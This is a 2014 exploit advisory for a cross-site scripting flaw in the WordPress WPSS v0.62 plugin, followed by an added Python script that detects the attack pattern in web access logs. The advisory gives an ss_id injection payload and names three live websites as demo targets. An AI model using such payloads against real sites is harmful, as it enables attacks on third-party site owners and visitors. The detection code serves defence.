|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: WordPress WPSS v0.62 Plugin Cross-Site Scripting |
| [*] Exploit Author: Ashiyane Digital Security Team |
| [*] Date: 2014-08-05 |
| [*] Vendor Homepage: http://timrohrer.com/blog/?page_id=71 |
| [*] Software Link: http://timrohrer.com/blog/files/wpSS_v0.62.zip |
| [*] Version: 0.62 |
| [*] Tested on: Windows, Mozilla Firefox |
|-------------------------------------------------------------------------|
| [*] PoC: |
| [*] [Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/> |
|-------------------------------------------------------------------------|
| [*] Demo: |
| [*] http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id="/> |
| [*] http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id="/> |
| [*] http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id="/> |
|-------------------------------------------------------------------------|
| [*] Discovered By: ACC3SS |
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
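
A detection check for the request pattern shown in the PoC, as an added example that is not part of the original advisory: it scans web access logs for requests to ss_handler.php whose ss_id value decodes to quote or angle-bracket characters. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Handler path from the advisory, under any install prefix.
HANDLER = re.compile(r"/wp-content/plugins/wpSS/ss_handler\.php$", re.I)
# Characters that let a reflected value break out of an HTML attribute or tag.
BREAKOUT = re.compile(r"[\"'<>]")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_ss_id(target):
    """Return decoded ss_id values in a request target that contain markup characters."""
    # Split by hand: urlsplit() would read a leading "//" as a host name.
    path, _, query = target.partition("?")
    if not HANDLER.search(unquote(path)):
        return []
    values = parse_qs(query, keep_blank_values=True).get("ss_id", [])
    decoded = [decode_fully(v) for v in values]
    return [v for v in decoded if BREAKOUT.search(v)]

def find_hits(log_lines):
    """Return (line_number, decoded_value) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, v) for v in suspicious_ss_id(match.group(1)))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Aug/2014:10:00:00 +0000] "GET /wp-content/plugins/wpSS/ss_handler.php?ss_id=3 HTTP/1.1" 200 512',
    '203.0.113.9 - - [05/Aug/2014:10:00:04 +0000] "GET /wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=%22%2F%3E HTTP/1.1" 200 498',
    '203.0.113.9 - - [05/Aug/2014:10:00:07 +0000] "GET /wp-content/plugins/wpSS/ss_handler.php?ss_id=%2522%252F%253E HTTP/1.1" 200 498',
    '198.51.100.2 - - [05/Aug/2014:10:01:00 +0000] "GET /index.php?s=%22hello%22 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [05/Aug/2014:10:02:00 +0000] "GET //wp-content/plugins/wpSS/ss_handler.php?ss_id=%22/%3E HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for number, value in find_hits(SAMPLE_LOG):
        print(f"line {number}: ss_id={value!r}")
```

The same character test can serve as a temporary blocking rule in front of the handler until the plugin is removed or the parameter is validated and HTML-escaped on output.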